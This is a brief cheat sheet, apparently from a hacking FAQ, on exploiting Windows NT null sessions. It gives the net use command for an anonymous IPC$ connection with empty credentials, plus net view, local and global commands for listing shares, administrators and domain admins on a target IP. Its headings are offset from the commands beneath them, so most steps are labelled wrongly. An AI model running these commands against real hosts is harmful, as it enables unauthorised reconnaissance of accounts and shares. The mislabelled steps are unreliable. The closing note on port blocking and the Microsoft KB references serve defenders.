How to create a null session:
How to access shares after creation of null session:
net use \\IP_ADDRESS\ipc$ "" /user:""
How to list administrators after creation of null session:
net view \\IP_ADDRESS
How to list group members in "domain admins" after creation of null session:
local administrators \\IP_ADDRESS
The utilities local.exe and global.exe. They are part of the Windows NT Resource Kit. WInfo is a 3rd party utility that also can exploit null sessions.
global "domain admins" \\IP_ADDRESS
Disabling Netbios or blocking the ports 137-139 doesn't close for Null-Sessions, unless one also closes the SMB on port 445.
Related Restrict access to NULL sessions
More Info MS KB132679
More Info MS KB289655
Credits The Hack FAQ